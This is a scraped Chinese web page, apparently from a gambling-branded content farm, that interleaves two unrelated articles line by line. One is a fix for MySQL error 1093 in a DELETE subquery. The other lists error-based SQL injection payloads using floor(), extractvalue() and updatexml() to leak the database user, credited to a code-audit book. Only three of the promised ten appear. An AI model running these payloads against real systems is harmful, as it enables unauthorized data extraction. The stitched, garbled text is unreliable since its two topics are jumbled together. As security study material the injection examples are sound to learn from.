xml地图|网站地图|网站标签 [设为首页] [加入收藏]

您的位置:亚洲必赢 > 计算机尝试 > 十种MySQL报错注入

十种MySQL报错注入

发布时间:2019-05-24 06:51编辑:计算机尝试浏览(53)

    [Err] 1093 - You can't specify target table 'user' for update in FROM clause

    MySQL 报错 1093,mysql报错1093

    [Err] 1093 - You can't specify target table 'user' for update in FROM clause

    报错的sql如下:

    delete from `user` where id not in (select min(id) as id from `user` group by name );

    报错的来由是:不能够先select出同样表中的有个别值,再update这么些表(在同一语句中)。

    改成下边那样就好了(将摸清的数额再通过中间表查一回):

    delete from `user` where id not in (
      select id from(
        select min(id) as id from `十种MySQL报错注入。user` group by name
      ) id

    );

    报错 1093,mysql报错1093 [Err] 1093 - You can't specify target table 'user' for update in FROM clause 报错的sql如下: delete from `user` where id not in (select min(...

    /*10种报错注入、拾种爆错注入、*/

    报错的sql如下:

    均摘自《代码审计:集团级Web代码安全架构》一书

    delete from `user` where id not in (select min(id) as id from `user` group by name );

    文章转发:

    报错的原因是:不能先select出壹致表中的有个别值,再update这一个表(在同一语句中)。

    1.floor()

    改成上边那样就好了(将摸清的多少再通过中间表查一遍):

    select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

    delete from `user` where id not in (
      select id from(
        select min(id) as id from `user` group by name
      ) id

    图片 1

    );

    2.extractvalue()

    select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

    图片 2

    3.updatexml()

    select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

    本文由亚洲必赢发布于计算机尝试,转载请注明出处:十种MySQL报错注入

    关键词: 必赢亚洲真

上一篇:Service系统服务,搭建本地DNS解析

下一篇:没有了